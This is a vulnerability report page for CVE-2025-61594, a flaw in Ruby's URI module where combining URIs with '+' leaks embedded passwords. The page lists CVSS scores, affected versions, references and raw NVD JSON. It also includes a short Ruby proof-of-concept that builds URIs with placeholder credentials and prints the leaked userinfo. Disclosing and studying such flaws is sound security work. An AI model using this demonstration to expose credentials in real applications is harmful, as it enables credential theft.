Security Vulnerability Report
CVE-2025-61594 CVSS 7.5 HIGH

CVE-2025-61594

Published: 2025-12-30 21:15:44
Last Modified: 2026-04-16 18:16:44

Description

URI is a module providing classes to handle Uniform Resource Identifiers. In versions 0.12.4 and earlier (bundled in the Ruby 3.2 series), 0.13.2 and earlier (bundled in the Ruby 3.3 series), and 1.0.3 and earlier (bundled in the Ruby 3.4 series), when the + operator is used to combine URIs, sensitive information such as the password from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. This is a bypass of the fix for CVE-2025-27221 and can expose user credentials. This issue has been fixed in versions 0.12.5, 0.13.3 and 1.0.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:* (versions before 0.12.5) - VULNERABLE
cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:* (versions from 0.13.0, before 0.13.3) - VULNERABLE
cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:* (versions from 1.0.0, before 1.0.4) - VULNERABLE
Ruby URI 0.12.4 and earlier (Ruby 3.2 series)
Ruby URI 0.13.2 and earlier (Ruby 3.3 series)
Ruby URI 1.0.3 and earlier (Ruby 3.4 series)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ruby
require 'uri'

# Create a URI with credentials (example.com is a placeholder host)
original_uri = URI('http://user:secretpassword@example.com/path')

# Another URI to combine with
another_uri = URI('/another/path')

# Using the + operator to combine URIs - this leaks the password
combined_uri = original_uri + another_uri

# The password 'secretpassword' is leaked in the combined URI
puts "Original URI: #{original_uri}"
puts "Combined URI: #{combined_uri}"
puts "Password leaked: #{combined_uri.userinfo}"

# Demonstrating the bypass of the CVE-2025-27221 fix:
# the fix for CVE-2025-27221 may have addressed specific cases,
# but the + operator still exposes credentials

# Example showing credential exposure (example.com is a placeholder host)
malicious_uri = URI('http://admin:admin123@example.com/api') + URI('/public/endpoint')
puts "Malicious URI with leaked credentials: #{malicious_uri}"
# Output will contain 'admin:admin123'

References

https://github.com/advisories/GHSA-22h5-pq3x-2gf2
https://github.com/ruby/uri/security/advisories/GHSA-j4pr-3wm6-xx2r
https://hackerone.com/reports/2957667
https://www.ruby-lang.org/en/news/2025/02/26/security-advisories

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61594", "sourceIdentifier": "[email protected]", "published": "2025-12-30T21:15:43.893", "lastModified": "2026-04-16T18:16:44.400", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "URI is a module providing classes to handle Uniform Resource Identifiers. In versions 0.12.4 and earlier (bundled in Ruby 3.2 series) 0.13.2 and earlier (bundled in Ruby 3.3 series), 1.0.3 and earlier (bundled in Ruby 3.4 series), when using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. This is a a bypass for the fix to CVE-2025-27221 that can expose user credentials. This issue has been fixed in versions 0.12.5, 0.13.3 and 1.0.4."}, {"lang": "es", "value": "URI es un módulo que proporciona clases para manejar Identificadores Uniformes de Recursos. En versiones anteriores a 0.12.5, 0.13.3 y 1.0.4, existe un bypass para la corrección de CVE-2025-27221 que puede exponer credenciales de usuario. Al usar el operador '+' para combinar URIs, información sensible como contraseñas del URI original puede filtrarse, violando RFC3986 y haciendo que las aplicaciones sean vulnerables a la exposición de credenciales. 
Las versiones 0.12.5, 0.13.3 y 1.0.4 corrigen el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.12.5", "matchCriteriaId": "488EF0F7-7510-451A-9EFC-85673ADC364D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.13.0", "versionEndExcluding": "0.13.3", "matchCriteriaId": "336CB58A-5975-4516-86A6-FAC69551C4A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.4", "matchCriteriaId": "7930C9E3-5EEA-40F9-8299-25B6C681BAD6"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-22h5-pq3x-2gf2", "source": "[email protected]"}, {"url": "https://github.com/ruby/uri/security/advisories/GHSA-j4pr-3wm6-xx2r", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/2957667", "source": "[email protected]"}, {"url": "https://www.ruby-lang.org/en/news/2025/02/26/security-advisories", "source": "[email protected]"}]}}